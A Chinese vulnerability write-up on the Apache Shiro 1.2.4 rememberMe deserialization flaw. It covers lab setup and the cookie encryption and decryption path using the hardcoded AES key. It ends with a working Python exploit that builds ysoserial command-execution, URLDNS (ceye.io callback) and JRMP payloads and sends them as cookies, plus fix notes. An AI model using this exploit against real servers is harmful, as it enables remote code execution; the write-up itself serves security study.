环境搭建
1 2 3
| git clone https://github.com/apache/shiro.git cd shiro git checkout shiro-root-1.2.4
|
编辑pom.xml
,添加如下jar包
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21
| <properties> <maven.compiler.source>1.6</maven.compiler.source> <maven.compiler.target>1.6</maven.compiler.target> </properties> ... <dependencies> <dependency> <groupId>javax.servlet</groupId> <artifactId>jstl</artifactId> <version>1.2</version> <scope>runtime</scope> </dependency> ..... <dependency> <groupId>org.apache.commons</groupId> <artifactId>commons-collections4</artifactId> <version>4.0</version> </dependency> <dependencies>
|
创建~/.m2/toolchains.xml
文件,添加jdk1.6环境
1 2 3 4 5 6 7 8 9 10 11 12
| <toolchains> <toolchain> <type>jdk</type> <provides> <version>1.6</version> <vendor>sun</vendor> </provides> <configuration> <jdkHome>D:\Java\jdk1.6.0_45</jdkHome> </configuration> </toolchain> </toolchains>
|
编译成war包
1 2
| cd shiro/samples/web mvn package -D maven.skip.test=true
|
把生成的samples-web-1.2.4.war
放到Tomcat的webapps目录下,为了方便重命名为shiro.war
启动tomcat,访问http://127.0.0.1:8080/shiro/
,搭建完成
data:image/s3,"s3://crabby-images/31897/31897ffab61eac7c90d800cc76ea0f96ce314313" alt="image-20200728102626680"
漏洞链分析
加密过程
因为漏洞出现在Remember Me
,所以我们记得勾选,然后再进行登录
data:image/s3,"s3://crabby-images/05c92/05c92023ce0d09b6a76389c017075a8de795215c" alt="image-20200731112027369"
在 org.apache.shiro.mgt.AbstractRememberMeManager#onSuccessfulLogin
处下个断点,传入的三个参数都包含了我们登陆的信息
data:image/s3,"s3://crabby-images/07b5e/07b5eaba2feefad8fb81fdbfff781e3d78eafa78" alt="image-20200731112430152"
跟进forgetIdentity
方法,它会对subject
变量进行处理
data:image/s3,"s3://crabby-images/1d906/1d906c1fc4350d70653eafd02c70be30dba6c467" alt="image-20200731112640520"
继续跟进forgetIdentity
方法,我们会发现它主要是对set-cookie
的一些处理
data:image/s3,"s3://crabby-images/c938b/c938b5c7fe208c36719e57cc563832d46b25f0d9" alt="image-20200731112808224"
继续跟进下一步,首先会判断我们有无设置Remember Me
,如果有的话就会进入rememberIdentity
函数
data:image/s3,"s3://crabby-images/e55f1/e55f1137bf155c4e4315f6748df41dbfd74c782a" alt="image-20200731113121803"
继续跟进,也是对用户的登录信息进行处理
data:image/s3,"s3://crabby-images/f9b59/f9b59a8f49eb813038e4c7c12ff3729f245e3179" alt="image-20200731113634580"
我们可以看到他们把用户信息序列化之后,会进行加密
data:image/s3,"s3://crabby-images/03170/031701ff5f9223ea61889f743195d664cd078e73" alt="image-20200731113733542"
这里是加密函数,这一步是获取加密所采取的方法
data:image/s3,"s3://crabby-images/2cf94/2cf94bcbce0f347dcdbc92631f32b0724f999ea6" alt="image-20200731113853889"
观察本地变量,我们可以看到它加密的方法用的是AES的CBC方式
data:image/s3,"s3://crabby-images/4c4b8/4c4b80a53a6964983786c60d813d9539ef5211cc" alt="image-20200731114018051"
数据加密主要发生在这一步
data:image/s3,"s3://crabby-images/0b500/0b5003a07f73094b7cb5c50251c4da1db5306496" alt="image-20200731141144566"
getEncryptionCipherKey
函数是获得加密所需要的Key
,因为传入的是空参数,所以采用的是默认的Key
,这个是可以直接在源码找到的
data:image/s3,"s3://crabby-images/0b500/0b5003a07f73094b7cb5c50251c4da1db5306496" alt="image-20200731142820956"
然后会将序列化好的数据进行AES加密
data:image/s3,"s3://crabby-images/4e691/4e691b96ce35468fc4d2fe6781350654de5351b6" alt="image-20200731141442083"
加密完之后就会返回加密的结果
data:image/s3,"s3://crabby-images/8d963/8d96388d4b749e6df8b6e6da1909b4f7b34081d3" alt="image-20200731114416038"
后面会对返回后的加密值进行进一步处理
data:image/s3,"s3://crabby-images/a8683/a86832441f444c9aef4a9c08fa7665e2e1c10927" alt="image-20200731114450542"
是对序列化后的值进行Base64
加密后存放在Cookie
中
data:image/s3,"s3://crabby-images/4e691/4e691b96ce35468fc4d2fe6781350654de5351b6" alt="image-20200731114542521"
整个登录过程大致为这样
解密过程
要想找到解密的入口位置,首先我们需要在 org.apache.shiro.mgt.AbstractRememberMeManager#decrypt
下个断点
data:image/s3,"s3://crabby-images/78b71/78b715b09932719a4645110ecc2e39375c3d009e" alt="image-20200731143126894"
这是我们得到的调用链,根据函数名字我们可以知道,getRememberedIdentity
是获取cookie
中的rememberMe
进行解析,所以我们可以选择在org.apache.shiro.mgt.AbstractRememberMeManager#getRememberedIdentity
下一个断点
1 2 3 4
| 1. decrypt:486, AbstractRememberMeManager (org.apache.shiro.mgt) 2. convertBytesToPrincipals:429, AbstractRememberMeManager (org.apache.shiro.mgt) 3. getRememberedPrincipals:396, AbstractRememberMeManager (org.apache.shiro.mgt) 4. getRememberedIdentity:604, DefaultSecurityManager (org.apache.shiro.mgt)
|
然后我们跟进一下getRememberedPrincipals
这个函数
data:image/s3,"s3://crabby-images/f8482/f8482b43843f5eebca46f7c60a10b4e59b8be01f" alt="image-20200731152746429"
首先是是要得到rememberMe
序列化后的值
data:image/s3,"s3://crabby-images/c6814/c68144ba49c1396a12870b2b14b69638753c96b7" alt="image-20200731153224590"
跟进以后可以看到是进行了Base64.deocde
之后再返回序列化数据
data:image/s3,"s3://crabby-images/cfec0/cfec0a3131ead64def05ea68482b842e9ead9269" alt="image-20200731153715075"
到convertBytesToPrincipals
函数应该就是AES
解密的操作了
data:image/s3,"s3://crabby-images/9263c/9263c799d345b405ceb9c1a80fc75e78e8f02214" alt="image-20200731153843497"
继续跟进解密函数
data:image/s3,"s3://crabby-images/da91a/da91a060db13c1d1ab91787b72cac2d74f9be940" alt="image-20200731153944948"
然后获取加解密服务类进行解密,使用的key
依然是默认key
data:image/s3,"s3://crabby-images/b6be5/b6be56cc1b0c0bdc751dd56486b3aa1ec70b834b" alt="image-20200731154036729"
首先是获取解密需要的iv
值,后面就是很正常的AES
解密步骤了
data:image/s3,"s3://crabby-images/43e02/43e02b52514b6ff74134a31f4928e276eaa776f0" alt="image-20200731151402487"
之后返回解密后的序列化值
data:image/s3,"s3://crabby-images/a3362/a33625bde5c939925571c092da320f8ed4679f04" alt="image-20200731155653747"
然后就是最后一步的反序列化
data:image/s3,"s3://crabby-images/48db9/48db9081bc13b659ab4b172fd6689631bea4d624" alt="image-20200731161249665"
后面是就调用readObject
函数进行反序列化了
data:image/s3,"s3://crabby-images/1e990/1e99030bf8307b1595aa6f65501a9cc6a8129908" alt="image-20200731161543385"
按理来说到这里就可以直接操作get shell了,但是这里还有另外一个问题
在@orange和@zsx文章中提到
Shiro resovleClass使用的是ClassLoader.loadClass()而非Class.forName(),而ClassLoader.loadClass不支持装载数组类型的class。
我们继续跟进readObject
,我们会发现shiro重构了自己的resolveClass
,这里使用的是ClassUtils.forName
而jdk原版的resovleClass
是 Class.forName
data:image/s3,"s3://crabby-images/cfb85/cfb85dde6593db2842b0366cf6a3866ac899539f" alt="image-20200731162304022"
跟进去发现其实底层是调用了loadClass
函数
data:image/s3,"s3://crabby-images/81c11/81c11a564d4516f543df8346ce9816ea49fc698f" alt="image-20200731162553365"
漏洞利用
编写exp如下
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59
| import requests as rq import subprocess import base64 import uuid from Crypto.Cipher import AES from random import Random
target = 'http://127.0.0.1:8080/shiro/' dns_server = 'http://xxxxx.ceye.io' use_jar = ['java', '-jar', 'ysoserial-0.0.6-SNAPSHOT-all.jar'] cmd = 'touch /tmp/shiro.txt' jrmp_server_ip = '127.0.0.1' jrmp_server_port = '9999'
def self_cmd(): popen = subprocess.Popen(use_jar + ['CommonsCollections2', cmd], stdout=subprocess.PIPE) payload = popen.stdout.read() return payload
def urldns(): print(f"[*] test dns_server:\n{dns_server}") popen = subprocess.Popen(use_jar + ['URLDNS', dns_server], stdout=subprocess.PIPE) payload = popen.stdout.read() return payload
def jrmp(): popen = subprocess.Popen(use_jar + ['JRMPClient', f"{jrmp_server_ip}:{jrmp_server_port}"], stdout=subprocess.PIPE) payload = popen.stdout.read() return payload
def exp(payload): BS = AES.block_size pad = lambda s: s + ((BS - len(s) % BS) * chr(BS - len(s) % BS)).encode() key = "kPH+bIxk5D2deZiIxcaaaA==" mode = AES.MODE_CBC iv = uuid.uuid4().bytes encryptor = AES.new(base64.b64decode(key), mode, iv) padding = pad(payload) b64 = base64.b64encode(iv + encryptor.encrypt(padding)).decode()
try: print(f'[*] send payload:\n{b64}') res = rq.get(target, cookies={'rememberMe': b64}) print(f'[*] send finished') except Exception as e: print(f"[*] send failed:\n{e}")
if __name__ == "__main__": exp(jrmp())
|
但是不知道为什么JRMP打不通,如果有师傅知道的可以指点一下
推荐一个好用的工具:https://github.com/feihong-cs/ShiroExploit
修复方式
针对这个问题shiro解决了自带的硬编码的问题,当然如果用户还是用硬编码的方式,一旦key泄漏,一样是会造成反序列化的问题。
官方针对这个问题的修复方式:
1、删除相关默认密钥
2、如果没有配置密钥,会随机生成一个密钥。
参考资料
http://www.lmxspace.com/2019/10/17/Shiro-反序列化记录/
https://paper.seebug.org/shiro-rememberme-1-2-4/
https://www.cnblogs.com/paperpen/p/11312671.html